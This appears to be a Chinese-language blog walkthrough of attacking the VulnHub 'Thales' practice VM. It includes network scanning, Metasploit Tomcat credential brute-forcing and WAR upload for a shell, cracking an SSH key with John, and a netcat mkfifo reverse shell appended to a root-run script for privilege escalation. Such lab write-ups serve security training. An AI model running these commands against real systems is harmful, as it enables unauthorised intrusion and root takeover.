今天实践的是vulnhub的Thales镜像,
下载地址,https://download.vulnhub.com/thales/Thales.zip,
用workstation导入成功,但是扫描不到有服务的地址,
重新用virtualbox导入,重新做地址扫描,
sudo netdiscover -r 192.168.1.0/24,
试了一下,应该是192.168.1.106,继续做端口扫描,
sudo nmap -sS -sV -T5 -A -p- 192.168.1.106,
看到8080端口跑了http服务,直接浏览器访问看看,
看来是tomcat,这就可以试试扫描后台登录账户了,
msfconsole
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.1.106
set USERNAME tomcat
set VERBOSE false
exploit
扫描出来了后台账户,tomcat/role1,继续拿shell,
use exploit/multi/http/tomcat_mgr_upload
set RHOSTS 192.168.1.106
set RPORT 8080
set HttpUsername tomcat
set HttpPassword role1
exploit
成功拿到shell,但不是root,继续想办法提权,
先转成交互式的,python3 -c 'import pty; pty.spawn("/bin/bash")',
发现home下的账户thales,以及ssh登录的私钥,
把私钥搞出来,做密码破解,
ssh2john id_rsa > sshhash,
john --wordlist=/usr/share/wordlists/rockyou.txt sshhash,
得到了账户密码,thales/vodka06,
切到thales账户,发现不支持切到root,
在thales账户下查看notes.txt内容发现了/usr/local/bin/backup.sh,
而且/usr/local/bin/backup.sh是当前账户可写,又是root权限的,
kali攻击机上用nc起个监听,nc -lvp 8888,
给/usr/local/bin/backup.sh添加脚本,
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.104 8888 >/tmp/f" >>/usr/local/bin/backup.sh,
等了一会而,kali攻击机收到了shell,id看一下确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Thales的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论